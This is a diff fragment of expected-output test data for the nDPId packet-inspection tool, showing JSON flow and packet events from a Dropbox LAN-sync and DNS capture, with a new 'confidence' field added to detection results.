-00615{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":824,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182817566,"flow_last_seen":1459182817566,"flow_idle_time":180000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":195,"midstream":0,"ts_msec":1459182817566,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":824,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182817566,"flow_last_seen":1459182817566,"flow_idle_time":180000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":195,"midstream":0,"ts_msec":1459182817566,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00699{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":825,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1459182817566,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":237,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":237,"pkt_l4_len":203,"ts_msec":1459182817566,"pkt":"\/\/\/\/\/\/\/\/eJKcD6iOCABFAADf1cRAAEAR35DAqAFpwKgB\/0RcRFwAywVkeyJob3N0X2ludCI6IDI3NDM2MzU3MDAzNjkzNDgyMzM2MDM0MTQwOTA1MTg0MTU3MzU3OSwgInZlcnNpb24iOiBbMiwgMF0sICJkaXNwbGF5bmFtZSI6ICIiLCAicG9ydCI6IDE3NTAwLCAibmFtZXNwYWNlcyI6IFsyMDYwMzE0MCwgMTY3MTU2ODYsIDQ4NzQ1ODk1LCAxOTA3NjA0MCwgODc5NTY4MDQzLCAxMjM1MzUwMzAsIDE4MjE2NDkyMl19"}
 00699{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":826,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1459182817566,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":237,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":237,"pkt_l4_len":203,"ts_msec":1459182817566,"pkt":"\/\/\/\/\/\/\/\/eJKcD6iOCABFAADf1cRAAEAR35DAqAFpwKgB\/0RcRFwAywVkeyJob3N0X2ludCI6IDI3NDM2MzU3MDAzNjkzNDgyMzM2MDM0MTQwOTA1MTg0MTU3MzU3OSwgInZlcnNpb24iOiBbMiwgMF0sICJkaXNwbGF5bmFtZSI6ICIiLCAicG9ydCI6IDE3NTAwLCAibmFtZXNwYWNlcyI6IFsyMDYwMzE0MCwgMTY3MTU2ODYsIDQ4NzQ1ODk1LCAxOTA3NjA0MCwgODc5NTY4MDQzLCAxMjM1MzUwMzAsIDE4MjE2NDkyMl19"}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":827,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182818229,"flow_last_seen":1459182818229,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1459182818229,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":33189,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":827,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1459182818229,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1459182818229,"pkt":"8IQvSpdgeJKcD6iOCABFAABAQCRAAEARddHAqAFpwKgB\/oGlADUALERt3H0BAAABAAAAAAAABm5vdGlmeQdkcm9wYm94A2NvbQAAAQAB"}
-00746{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":827,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182818229,"flow_last_seen":1459182818229,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1459182818229,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":33189,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"notify.dropbox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":827,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182818229,"flow_last_seen":1459182818229,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1459182818229,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":33189,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"notify.dropbox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":828,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1459182818229,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1459182818229,"pkt":"8IQvSpdgeJKcD6iOCABFAABAQCRAAEARddHAqAFpwKgB\/oGlADUALERt3H0BAAABAAAAAAAABm5vdGlmeQdkcm9wYm94A2NvbQAAAQAB"}
 00766{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":829,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1459182818263,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":294,"pkt_l4_len":260,"ts_msec":1459182818263,"pkt":"eJKcD6iO8IQvSpdgCABFAAEYAABAAEARtR3AqAH+wKgBaQA1gaUBBH9u3H2BgAABAAEABAAEBm5vdGlmeQdkcm9wYm94A2NvbQAAAQABwAwAAQABAAAAcQAEon0Rg8AMAAIAAQAAAHEAFwducy0xMTU0CWF3c2Rucy0xNgNvcmcAwAwAAgABAAAAcQASBW5zLTgzCWF3c2Rucy0xMMAbwAwAAgABAAAAcQAWBm5zLTg5NQlhd3NkbnMtNDcDbmV0AMAMAAIAAQAAAHEAGQducy0xOTM2CWF3c2Rucy01MAJjbwJ1awDAYwABAAEAAVOfAATN+8BTwIEAAQABAAFTrgAEzfvDf8BAAAEAAQABU6sABM37xILAowABAAEAAVN1AATN+8eQ"}
-00764{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":829,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1459182818229,"flow_last_seen":1459182818263,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":252,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":108,"midstream":0,"ts_msec":1459182818263,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":33189,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"notify.dropbox.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"162.125.17.131"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":837,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1459182798651,"flow_last_seen":1459182798820,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":624,"flow_avg_l4_payload_len":156,"midstream":0,"ts_msec":1535391465534,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":50789,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"}}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":837,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1459182817566,"flow_last_seen":1459182830673,"flow_idle_time":180000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":1170,"flow_avg_l4_payload_len":195,"midstream":0,"ts_msec":1535391465534,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":837,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1459182798602,"flow_last_seen":1459182798781,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":264,"flow_tot_l4_payload_len":606,"flow_avg_l4_payload_len":151,"midstream":0,"ts_msec":1535391465534,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":49112,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":837,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1459182796665,"flow_last_seen":1459182796786,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":654,"flow_avg_l4_payload_len":163,"midstream":0,"ts_msec":1535391465534,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":55407,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"}}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":837,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1459182817566,"flow_last_seen":1459182830673,"flow_idle_time":180000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":1170,"flow_avg_l4_payload_len":195,"midstream":0,"ts_msec":1535391465534,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":837,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1459182818229,"flow_last_seen":1459182818263,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":252,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":144,"midstream":0,"ts_msec":1535391465534,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":33189,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"}}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":837,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1459182816605,"flow_last_seen":1459182816645,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":1054,"flow_avg_l4_payload_len":131,"midstream":0,"ts_msec":1535391465534,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":36173,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"}}
+00790{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":829,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1459182818229,"flow_last_seen":1459182818263,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":252,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":108,"midstream":0,"ts_msec":1459182818263,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":33189,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"notify.dropbox.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"162.125.17.131"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":837,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1459182798651,"flow_last_seen":1459182798820,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":624,"flow_avg_l4_payload_len":156,"midstream":0,"ts_msec":1535391465534,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":50789,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":837,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1459182817566,"flow_last_seen":1459182830673,"flow_idle_time":180000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":1170,"flow_avg_l4_payload_len":195,"midstream":0,"ts_msec":1535391465534,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":837,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1459182798602,"flow_last_seen":1459182798781,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":264,"flow_tot_l4_payload_len":606,"flow_avg_l4_payload_len":151,"midstream":0,"ts_msec":1535391465534,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":49112,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":837,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1459182796665,"flow_last_seen":1459182796786,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":654,"flow_avg_l4_payload_len":163,"midstream":0,"ts_msec":1535391465534,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":55407,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":837,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1459182817566,"flow_last_seen":1459182830673,"flow_idle_time":180000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":1170,"flow_avg_l4_payload_len":195,"midstream":0,"ts_msec":1535391465534,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":837,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1459182818229,"flow_last_seen":1459182818263,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":252,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":144,"midstream":0,"ts_msec":1535391465534,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":33189,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":837,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1459182816605,"flow_last_seen":1459182816645,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":1054,"flow_avg_l4_payload_len":131,"midstream":0,"ts_msec":1535391465534,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":36173,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"}}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":837,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1535391465534,"flow_last_seen":1535391465534,"flow_idle_time":180000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":0,"ts_msec":1535391465534,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":837,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1535391465534,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"ts_msec":1535391465534,"pkt":"\/\/\/\/\/\/\/\/rNG4wD8JCABFAADEWzxAAEARHT\/AqAEG\/\/\/\/\/0RcRFwAsAWteyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiZGlzcGxheW5hbWUiOiAiIiwgImhvc3RfaW50IjogMTQyNjI0OTI5OTAwNTgxMDUzNDA3MzQwMDE2NzI1NzY2ODExMzI2LCAibmFtZXNwYWNlcyI6IFszMTE2NDIwNDE2LCAzMjA5MzgyOTQ0LCAxMjM1ODYyNywgMTEzODA0NDM2N119"}
-00615{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":837,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1535391465534,"flow_last_seen":1535391465534,"flow_idle_time":180000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":0,"ts_msec":1535391465534,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":837,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1535391465534,"flow_last_seen":1535391465534,"flow_idle_time":180000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":0,"ts_msec":1535391465534,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":838,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1535391465535,"flow_last_seen":1535391465535,"flow_idle_time":180000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":0,"ts_msec":1535391465535,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":838,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1535391465535,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"ts_msec":1535391465535,"pkt":"\/\/\/\/\/\/\/\/rNG4wD8JCABFAADENtRAAEARfv\/AqAEGwKgB\/0RcRFwAsEMFeyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiZGlzcGxheW5hbWUiOiAiIiwgImhvc3RfaW50IjogMTQyNjI0OTI5OTAwNTgxMDUzNDA3MzQwMDE2NzI1NzY2ODExMzI2LCAibmFtZXNwYWNlcyI6IFszMTE2NDIwNDE2LCAzMjA5MzgyOTQ0LCAxMjM1ODYyNywgMTEzODA0NDM2N119"}
-00613{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":838,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1535391465535,"flow_last_seen":1535391465535,"flow_idle_time":180000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":0,"ts_msec":1535391465535,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":838,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1535391465535,"flow_last_seen":1535391465535,"flow_idle_time":180000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":0,"ts_msec":1535391465535,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":839,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1535391495539,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"ts_msec":1535391495539,"pkt":"\/\/\/\/\/\/\/\/rNG4wD8JCABFAADEaV5AAEARDx3AqAEG\/\/\/\/\/0RcRFwAsAWteyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiZGlzcGxheW5hbWUiOiAiIiwgImhvc3RfaW50IjogMTQyNjI0OTI5OTAwNTgxMDUzNDA3MzQwMDE2NzI1NzY2ODExMzI2LCAibmFtZXNwYWNlcyI6IFszMTE2NDIwNDE2LCAzMjA5MzgyOTQ0LCAxMjM1ODYyNywgMTEzODA0NDM2N119"}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":840,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1535391495539,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"ts_msec":1535391495539,"pkt":"\/\/\/\/\/\/\/\/rNG4wD8JCABFAADEPR9AAEAReLTAqAEGwKgB\/0RcRFwAsEMFeyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiZGlzcGxheW5hbWUiOiAiIiwgImhvc3RfaW50IjogMTQyNjI0OTI5OTAwNTgxMDUzNDA3MzQwMDE2NzI1NzY2ODExMzI2LCAibmFtZXNwYWNlcyI6IFszMTE2NDIwNDE2LCAzMjA5MzgyOTQ0LCAxMjM1ODYyNywgMTEzODA0NDM2N119"}
 00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":841,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1535391525545,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"ts_msec":1535391525545,"pkt":"\/\/\/\/\/\/\/\/rNG4wD8JCABFAADEd25AAEARAQ3AqAEG\/\/\/\/\/0RcRFwAsAWteyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiZGlzcGxheW5hbWUiOiAiIiwgImhvc3RfaW50IjogMTQyNjI0OTI5OTAwNTgxMDUzNDA3MzQwMDE2NzI1NzY2ODExMzI2LCAibmFtZXNwYWNlcyI6IFszMTE2NDIwNDE2LCAzMjA5MzgyOTQ0LCAxMjM1ODYyNywgMTEzODA0NDM2N119"}
 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":842,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1535391525545,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"ts_msec":1535391525545,"pkt":"\/\/\/\/\/\/\/\/rNG4wD8JCABFAADETEZAAEARaY3AqAEGwKgB\/0RcRFwAsEMFeyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiZGlzcGxheW5hbWUiOiAiIiwgImhvc3RfaW50IjogMTQyNjI0OTI5OTAwNTgxMDUzNDA3MzQwMDE2NzI1NzY2ODExMzI2LCAibmFtZXNwYWNlcyI6IFszMTE2NDIwNDE2LCAzMjA5MzgyOTQ0LCAxMjM1ODYyNywgMTEzODA0NDM2N119"}
